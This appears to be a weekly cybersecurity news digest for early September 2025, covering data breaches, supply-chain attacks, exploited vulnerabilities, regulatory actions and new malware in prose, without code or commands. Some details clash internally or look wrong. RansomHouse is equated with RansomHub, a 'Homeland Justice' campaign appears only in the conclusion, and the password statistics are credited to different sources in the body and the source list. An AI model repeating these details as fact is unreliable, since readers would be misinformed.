Major Data Breaches and Leaks
Salesloft–Drift Supply Chain Breach – A far-reaching supply chain attack involving Salesloft’s Drift chatbot integration with Salesforce affected hundreds of companies. Threat actors stole OAuth tokens to access Salesforce CRM data at firms like Cloudflare, Palo Alto Networks, Workiva, and others. In many cases, the intruders exfiltrated customer contact info and support case data, then scanned the stolen records for credentials and secrets (API keys, passwords, cloud tokens) to facilitate further intrusions. Impacted organizations rapidly revoked tokens and notified customers; the campaign (attributed to the ShinyHunters group) underscores the danger of third-party integrations becoming weak links.
Plex User Database Breach – Media streaming platform Plex disclosed a breach and urged all users to reset passwords after a hacker accessed a segment of its user database. The stolen data included email addresses, usernames, and hashed passwords (stored following best practices). Plex said no payment information was exposed and that it quickly contained the incident, but it cautioned users to change passwords (and sign out of all devices) out of an abundance of caution. This was Plex’s second such breach in recent years (a similar one occurred in 2022).
Wealthsimple Data Leak – Canadian fintech Wealthsimple reported that attackers stole personal data of under 1% of its 3 million clients in a late-August incident. The breach, detected on August 30, was traced to a compromised third-party software package, not a direct hack of Wealthsimple’s systems. Exposed information included customers’ contact details, government ID scans, financial account numbers, IP addresses, SINs, and dates of birth. Wealthsimple emphasized that no passwords or funds were taken and customer accounts remain secure. Affected individuals are being offered two years of free credit and identity monitoring, and all users were advised to enable 2FA and be alert for phishing attempts using their data.
Lovesac Ransomware Breach – U.S. furniture retailer Lovesac confirmed that it fell victim to a cyberattack earlier this year which exposed personal data of an undisclosed number of individuals. The breach occurred between February 12 and March 3, 2025, when hackers accessed internal systems and stole data (including customers’ full names and other personal information). Lovesac contained the intrusion by March 3 and only disclosed it publicly in September via breach notification letters. Those affected are being offered 24 months of free credit monitoring as a precaution. Notably, the RansomHouse (aka “RansomHub”) ransomware gang had claimed responsibility back in March, suggesting this was part of a double-extortion attack. Lovesac says there is no sign yet that the stolen info has been misused, but recipients of the breach notice were urged to remain vigilant against scams.
Significant Cyberattacks and Incidents
Bridgestone Manufacturing Outage – Tire manufacturing giant Bridgestone Americas suffered a cyberattack that disrupted operations at multiple production plants in the U.S. (South Carolina) and Canada (Quebec). The company responded by rapidly isolating systems, which it believes contained the attack before extensive damage occurred. Bridgestone reported no evidence of customer data theft or broader network compromise, although it temporarily halted some factory workflows. By week’s end, teams were working 24/7 to restore normal production and mitigate any supply chain delays. (In an unrelated incident in 2022, Bridgestone was hit by a LockBit ransomware attack, so the company was on high alert this time.) Bridgestone has not confirmed the nature of the latest attack, and no ransomware group has claimed credit as of yet.
Jaguar Land Rover Shutdown – Automaker Jaguar Land Rover (JLR) announced that a cyberattack over the weekend severely disrupted its vehicle production and IT systems. In response, JLR proactively shut down certain systems to contain the threat. The incident forced some manufacturing at the Solihull plant (UK) offline and impacted retail operations, though JLR stated it had no evidence that any customer data was stolen. By mid-week, the company was slowly restarting applications in a controlled manner and working to get factories back online. This attack follows warnings from law enforcement about ongoing cybercrime campaigns targeting the aviation and automotive industries (notably by the Scattered Spider group). Indeed, a hacker group affiliated with ShinyHunters claimed responsibility for the JLR breach, suggesting they exploited third-party systems connected to Salesforce and other services.
Widely-Used npm Packages Hijacked – In a major software supply chain incident, attackers compromised an npm maintainer’s account via a phishing email and then pushed malicious updates to at least 18 popular JavaScript packages (collectively downloaded ~2.6 billion times weekly). The affected libraries – including core utils like
debug,chalk,color-string, andansi-regex– were modified with malware that intercepts web traffic in applications that use these packages. Specifically, the malicious code hooks into web APIs and monitors cryptocurrency wallet addresses; if a crypto transaction is detected, it can silently redirect payments to attacker-controlled wallets, hijacking funds in transit. The window of compromise was brief (the rogue package versions were live for only a few hours on September 8 before npm security removed them), and only users who installed or updated those packages during that time would be infected. Nonetheless, this attack highlights the ongoing risk of open-source repository exploits. Developers are advised to review dependencies, rotate any credentials that may have been exposed, and implement 2FA on package accounts. (This incident is reminiscent of earlier npm compromises in March and July, showing adversaries’ continued focus on the open-source supply chain.)“GhostAction” Steals Dev Secrets – Another software supply chain campaign, dubbed GhostAction, was uncovered on GitHub. Threat actors hijacked GitHub repositories by adding malicious GitHub Actions workflow files to at least 817 open-source projects. Once these workflows ran (triggered via a push or manual trigger), they read dozens of secret environment variables (like cloud keys, npm/PyPI tokens, Docker credentials) and exfiltrated them via a rogue HTTP POST to the attackers’ server. Over 3,300 sensitive secrets were stolen in this manner before GitGuardian researchers exposed the operation. CI logs indicate the attackers enumerated common secret names across various languages and frameworks to maximize data theft. The campaign was active through early September; upon discovery, GitHub and package registries were alerted and many project owners quickly removed the malicious files. Developers are urged to check their repos for unexpected GitHub Action changes and rotate any leaked credentials. The GhostAction attack (which is distinct from the npm incident above) underscores the need for vigilant monitoring of build pipelines and the principle of least privilege for CI/CD credentials.
iCloud Phishing via Apple Servers – A crafty phishing campaign emerged in which scammers abused Apple’s iCloud Calendar invite feature to send emails that appeared to come legitimately from Apple’s own email domain. In one reported case, victims received an email from noreply@email.apple.com (passing all SPF/DKIM/DMARC checks) falsely claiming a $599 PayPal charge and providing a phone number to “dispute” the charge. The email was actually an iCloud calendar invite crafted with the scam text in the event notes; by inviting external email addresses (often Microsoft 365 accounts that forward to many users), the scammers caused Apple’s servers to send the phony notification, helping it bypass spam filters. Unsuspecting recipients who called the provided number were connected to fraudsters posing as support reps, who then attempted typical “callback scam” tricks (remote access to PC, refund hustles, etc). Security experts note this technique takes advantage of trusted cloud services to lend credibility to scams. Users should be wary of unexpected calendar invites or emails about payments — legitimate companies rarely include support phone numbers in unsolicited billing emails. Apple has been informed, though no official fix was announced yet; in the meantime, users can disable auto-add of calendar invites and report such phishing attempts.
Critical Vulnerabilities and Patches
Sitecore CRM Zero-Day (CVE-2025-53690) – A critical deserialization vulnerability in Sitecore Experience Platform (a popular web CMS/CRM) is being actively exploited in the wild. The flaw (CVSS 9.0) stems from a default machine key left in older Sitecore installations, which attackers use to forge malicious ViewState data and achieve remote code execution on the server. Mandiant investigators disclosed that attackers leveraged this bug to drop malware and create admin accounts in at least one incident. CISA has added CVE-2025-53690 to its Known Exploited Vulnerabilities catalog and ordered U.S. federal agencies to patch by September 25. Sitecore released fixes and urged customers to rotate any “sample” keys, audit for suspicious activity, and update immediately. Given the bug’s ease of exploitation (static keys are widely known) and the privileged access it grants, organizations running Sitecore should treat this as a top priority.
SAP S/4HANA Code Injection (CVE-2025-42957) – SAP admins are racing to patch a critical code injection flaw in SAP S/4HANA ERP software after reports that attackers are now exploiting it in real attacks. CVE-2025-42957 (CVSS 9.9) allows low-privileged users to execute arbitrary ABAP code, potentially leading to full takeover of the SAP application and underlying host. SAP released a patch for this in August’s update, but this week security firm SecurityBridge confirmed multiple exploit instances in the wild. The vulnerability is considered low complexity to weaponize – skilled malicious insiders or hackers with minimal access could leverage it to, for example, create new admin accounts, delete or alter financial records, steal password hashes, or even deploy ransomware on SAP systems. While exploitation so far appears limited (targeted attacks), all SAP S/4HANA customers are strongly advised to apply the available patch and examine logs for any anomalous user creation or remote function calls. This case highlights that even enterprise applications are prime targets for attackers once a critical bug becomes public.
Android Zero-Days Patched – Google’s September 2025 Android updates included fixes for 120 vulnerabilities, among them two critical flaws already under active exploit. The first, CVE-2025-38352, is a Linux Kernel privilege escalation bug that can allow a local app (or chained exploit) to gain root-level access; the second, CVE-2025-48543, is a privilege escalation in the Android Runtime. Google’s Threat Analysis Group discovered these being used in targeted attacks (likely as part of spyware campaigns). Users of Pixel and other Google-supported devices received patches immediately, while OEMs like Samsung and Xiaomi incorporated them in their security updates. Given the history of Android zero-days being used to install spyware on high-profile targets, it’s crucial for Android users to install the latest security patch (September 2025 or later) on their devices. These exploits underscore the importance of keeping mobile OSes updated, as attackers continue to actively target mobile platforms.
Data Center & IoT Warnings – Other notable vulnerabilities disclosed or patched this week include: a high-severity bug in SAP 3D Visual Enterprise License Manager (CVE-2025-52856) and two RCE flaws in QNAP QVR video surveillance systems, all patched in vendor updates. Meanwhile, security researchers warned of a newly found flaw in Next.js (CVE-2025-29927) that could enable server-side code execution in certain configurations – developers are urged to update to the latest Next.js release. Finally, Cisco users were alerted to unusual scanning activity (25,000+ IPs) targeting Cisco ASA VPN/Firewall devices. While no new ASA exploit is confirmed, such scanning often precedes the disclosure of a zero-day, so administrators should ensure their ASA appliances are fully patched and monitor for any attempted logins or config changes.
(The above highlights underscore the relentless pace of vulnerability discovery. Defenders should prioritize patches for any critical CVEs, especially those known to be exploited, and follow guidance from vendors and agencies like CISA.)
Government and Industry Cyber Responses
Texas Sues Over Mass School Breach – The Texas Attorney General filed a lawsuit against education software provider PowerSchool in response to a massive 2024 data breach. The breach, disclosed by PowerSchool in January, involved a compromise of its K-12 student information system that exposed records of 62 million students and 9.5 million staff across 6,505 school districts (including ~880,000 Texans). Attackers had stolen a subcontractor’s credentials and downloaded sensitive student data (names, addresses, Social Security numbers, medical and academic info); they later demanded a $2.85 million ransom and leaked the data when unpaid. Texas alleges PowerSchool’s security failures violated state consumer protection and data protection laws. The suit seeks financial penalties and improved security practices. This legal action by Texas – one of the largest data-breach-related suits in the education sector – signals that state governments are increasingly ready to hold companies accountable for failing to safeguard personal data, especially when children are involved.
U.S. Sanctions SE Asian Scam Networks – The U.S. government announced new sanctions targeting cybercrime rings in Southeast Asia running large-scale scam operations. The U.S. Treasury’s Office of Foreign Assets Control (OFAC) sanctioned nine individuals and twelve entities tied to so-called “scam compounds” in Myanmar and Cambodia. These criminal enterprises (often masquerading as casinos or call centers) are accused of conducting industrial-scale online fraud – including romance-investment scams and crypto schemes – that have defrauded victims worldwide of over $10 billion. Notably, the sanctioned parties include Burmese militia leaders and Chinese businessmen who facilitate forced-labor scam centers where trafficking victims are made to perpetrate scams under coercion. U.S. officials stated that the sanctions, which freeze U.S.-linked assets and bar transactions with the designated persons, aim to disrupt these networks’ finances and protect potential victims in the U.S. and elsewhere. This move follows several rounds of sanctions earlier in 2025 against similar operations, reflecting a growing international effort to crack down on transnational cyber-fraud and human trafficking rings.
Qantas Execs Penalized Post-Breach – In an example of corporate accountability, Australian airline Qantas revealed that it cut annual bonuses for top executives by 15% this year as a consequence of a major cyberattack. In its earnings report, Qantas noted the July 2025 breach (by the Scattered Spider group) that exposed personal data of 5.7 million customers had a serious impact on the company. While Qantas’ management quickly contained the incident and enhanced security afterward, the Board’s chairman stated that leadership must “share accountability” for the failure. The bonus reduction translates to about $250,000 less pay for the CEO and proportional cuts for other executives. Qantas’ response stands out as an industry precedent – effectively imposing financial penalties on management for cybersecurity lapses. The company has since incorporated lessons from the attack into its risk management framework. This development sends a message that C-suites and boards are treating cyber incidents not just as IT issues but as organizational failures with real business consequences.
Record Privacy Fines in France – France’s data protection regulator, CNIL, issued record-setting GDPR fines this week over illegal tracking practices. Google was fined €325 million (≈$379M) and Shein (a Chinese e-commerce retailer) €150 million (≈$175M) for violating cookie consent laws. CNIL found that both companies were placing advertising cookies on users’ devices without obtaining valid consent. In Google’s case, the investigation highlighted that until late 2023, creating a Google account pushed users to accept personalized ads cookies by default, without clearly offering an opt-out – which CNIL ruled a breach of French law. Shein similarly was caught dropping trackers before consent. Shein has since adjusted its cookie consent mechanism and announced plans to appeal the fine. Google has been given 6 months to comply with French requirements or face additional penalties of €100K per day. These fines (among the largest ever under GDPR) underscore the continued regulatory focus on Big Tech’s data practices. Companies operating in the EU must ensure strict adherence to consent rules for cookies and tracking, as regulators show willingness to levy nine-figure penalties. (In a related note, a U.S. jury separately ordered Google to pay $425 million in a class-action privacy lawsuit this week, indicating global momentum in privacy enforcement.)
Miscellaneous
New APT28 “NotDoor” Backdoor – Russian state-backed hackers (APT28, linked to GRU) have been deploying a stealthy new backdoor for Microsoft Outlook, dubbed “NotDoor” (aka GONEPOSTAL). This malware comes as a malicious VBA macro embedded in Outlook rules, and is designed to await a trigger word via incoming email. Once the trigger email arrives, NotDoor allows the attackers to remotely exfiltrate emails and files, upload malware, and execute commands on the infected system – effectively turning the victim’s Outlook into a persistence mechanism. According to S2 Grupo’s LAB52, APT28 used NotDoor in targeted attacks against government and defense-related organizations in multiple NATO countries. The discovery of NotDoor is a reminder that advanced threat actors continue to innovate with email-based backdoors that can bypass many endpoint defenses. Organizations should harden their Outlook security (e.g. disable or restrict VBA macros in Office applications via Group Policy) and monitor for suspicious email rule creation, especially in high-value accounts.
AI in Malware and Defense – The intersection of AI and cybersecurity was highlighted by two developments: First, researchers unveiled an unusual malware called “AI Waifu RAT”, a Windows remote access trojan that actually embeds a local large-language model (AI assistant) to help process attacker commands. The RAT’s creators appear to use the AI to interpret and execute natural-language instructions (passed through a web UI) on the victim’s machine, effectively giving the malware a pseudo-“smart” controller. This experimental threat shows how generative AI can be misused to make malware more flexible or automated. Meanwhile, in a twist, security analysts noted that threat actors are attempting to weaponize a recently released defensive AI tool called HexStrike AI. HexStrike was meant to help automate penetration testing and find vulnerabilities, but attackers claim to have repurposed it into an exploitation engine to rapidly exploit newly disclosed flaws. This dual-use problem – where AI tools for defense can be turned to offense – underscores a growing reality: AI will be leveraged by both sides. Security teams may need to invest in AI-driven detection and response, while also preparing for malware and attacks that have AI components.
“GhostRedirector” SEO Fraud Scheme – ESET researchers profiled a new threat cluster called GhostRedirector, which has compromised at least 65 servers across Asia and South America for an SEO fraud-as-a-service operation. The attackers deploy a lightweight C++ backdoor dubbed “Rungan” along with a malicious IIS web server module named “Gamshen” on Windows servers they breach. Gamshen intercepts web traffic on those servers to stealthily manipulate search engine results, inserting or boosting the ranking of the attackers’ clients’ websites in search queries. In essence, the hacked servers are used as unwitting SEO booster nodes to fraudulently inflate the prominence of certain sites (likely for shady online businesses or scams). The GhostRedirector group has been active since at least 2024, and its model shows an evolution in cybercriminal monetization: beyond data theft or ransomware, infected infrastructure is being rented out for illicit SEO and click-fraud services. Organizations running self-hosted web servers should ensure they are patched and monitor for any unknown IIS modules or unusual outbound connections, as these can be indicators of such compromise.
Password Cracking on the Rise – A new industry report this week (the Picus “Blue Report 2025”) revealed a troubling trend: significantly more enterprise environments are succumbing to password cracking during security assessments. According to the report, 46% of tested environments had at least one password cracked, nearly double the 25% of environments observed last year. The cracked credentials often enable deeper penetration during red-team exercises, simulating how real attackers move laterally. Common issues include weak or reused passwords and inadequate password hash protection. This trend highlights the importance of organizations enforcing stronger password policies (length and complexity), eliminating default credentials, and implementing multi-factor authentication everywhere possible. It also suggests that attackers’ capabilities in cracking hashes (via improved GPU rigs or leaked password lists) are growing – making it imperative for defenders to reduce reliance on password-only security.
Cyber Conferences and Collaborations – The first week of September also saw several notable gatherings and initiatives in the cybersecurity community. In Washington, the annual Cybersecurity Summit hosted by US government agencies and private sector partners focused on improving public-private info-sharing and announced an expanded Joint Ransomware Task Force to coordinate responses to ransomware attacks globally. Separately, leading cybersecurity companies (including CrowdStrike, Mandiant, and Microsoft) disclosed a new collaborative effort to share real-time threat intelligence on critical infrastructure attacks. And in industry news, venture investments in cybersecurity startups remain robust – Cybersecurity Ventures reported that despite economic headwinds, global cyber startups raised over $2.5 billion in Q3 2025, targeting areas like AI-driven security, cloud data protection, and OT security. These developments demonstrate an ongoing emphasis on collective defense: from big conferences to threat intel sharing alliances, stakeholders are leaning into collaboration and innovation to keep pace with evolving threats.
Conclusion
Third-Party Risk is Paramount – This week’s breaches (Salesloft/Drift OAuth tokens, 3rd-party software at Wealthsimple, etc.) reinforce that supply chain and vendor-integrated attacks are now a top risk. Organizations must rigorously vet the security of SaaS providers and APIs, limit the data and permissions given to integrations, and have monitoring in place to detect unusual access via partner systems. In essence, trust but verify your supply chain: a weak link can expose hundreds of others.
Patch Urgently, Patch Often – The flurry of zero-days and exploited vulnerabilities (in Sitecore, Android, SAP, and others) is a stark reminder that keeping systems updated is not optional. Businesses should ensure they can deploy critical patches within days (if not hours) of release and consider virtual patching or workarounds when immediate updates aren’t possible. A single unpatched internet-facing server or device can open the door to a major incident – as evidenced by the Sitecore exploits. A robust vulnerability management program, coupled with threat intelligence on active exploits, is vital for risk reduction.
Stay Vigilant Against Sophisticated Phishing – From cleverly spoofed Apple emails to targeted spear-phishing of developers (npm maintainer) and diplomats (Homeland Justice campaign), social engineering remains extremely potent. Users at all levels need regular awareness training to spot new scam techniques. Technical controls can help (e.g. email authentication, attachment sandboxing), but human vigilance is often the last line of defense. This week showed that attackers will abuse even trusted services (like iCloud or GitHub) to get past filters – cultivating a skeptical, verify-before-trusting mindset among employees and customers is as important as ever.
Accountability and Enforcement are Growing – We’re seeing a global trend of greater accountability for cybersecurity. Governments are stepping in – whether through lawsuits (as in Texas vs PowerSchool), regulatory fines (CNIL’s record penalties), or sanctions (against scam networks) – to incentivize better security practices and punish negligence or malice. Likewise, companies like Qantas are holding their own leadership accountable when failures occur. The implications are clear: organizations that handle sensitive data are expected to uphold high security standards or face legal, financial, and reputational consequences. Cybersecurity is not just an IT issue, but a governance and business continuity issue that demands attention from the C-suite and board.
Adapting to the AI-Driven Future – The emergence of AI in both cyber offense and defense highlights a new frontier. Security teams should prepare for threats that leverage AI – whether it’s malware with pseudo-intelligence, automated hacking tools, or deepfake-driven social engineering – and simultaneously capitalize on AI for defense (to triage alerts, detect anomalies, etc.). The playing field is shifting quickly: those who adapt and incorporate AI ethically into their security operations will have an edge, while those who ignore it may find themselves outpaced by AI-augmented attackers. The key takeaway is to embrace innovation while remaining wary of its misuse.
In summary, the first week of September 2025 underscored that cybersecurity is a continuous, collective effort. From major breaches and active exploits to high-level responses and new technologies, the landscape is dynamic. Organizations and defenders should digest the lessons from these events – bolster identity security (passwords/tokens), tighten software supply chain controls, patch critical systems, educate users, and collaborate across the community. The threats may never slow down, but with vigilance, agility, and shared knowledge, we can stay one step ahead.
Sources
KrebsOnSecurity – In-depth investigative blog by Brian Krebs (coverage of Salesloft-Drift breach, npm package compromise, etc.).
The Record (Recorded Future News) – Cybersecurity news site (reporting on Sitecore zero-day, Qantas breach fallout, scam network sanctions, etc.).
Distributed Denial of Secrets (DDoSecrets) – Non-profit leak archive (for context on data leaks, though no major new leaks were referenced this week).
Dark Reading – Cybersecurity news and analysis (e.g., coverage of SAP S/4HANA vulnerability exploitation and other enterprise security news).
Cybersecurity Dive – Industry news outlet (highlighted research on the Sitecore vulnerability and other breaking cyber stories).
SecurityWeek – Security news site (detailed reports on vulnerabilities like CVE-2025-42957 in SAP and other threats).
The Hacker News – Popular cybersecurity news platform (weekly threat recap, Google/Shein fines story, etc. by Ravie Lakshmanan).
BleepingComputer – Security news and tech help forum (multiple breach reports – Plex, Wealthsimple, Lovesac – and alerts on attacks like GhostAction, npm hijacks, iCloud phishing).
CyberScoop – Cyber policy and national security-focused outlet (covered government actions such as CISA alerts and international cyber developments).
Cybernews – Online cybersecurity news site (provided additional context on the week’s malware and breach revelations).
BankInfoSecurity – InfoSecurity Media Group site (news on financial sector breaches and regulatory actions relevant to incidents like the PowerSchool case).
CrowdStrike (Threat Intelligence) – Reports and blog posts from CrowdStrike’s intel team (for APT28 NotDoor backdoor analysis and trends in adversary tactics).
Cybersecurity Ventures – Cyber economics research (tracked cybersecurity investments and published statistics like the increase in password cracking rates).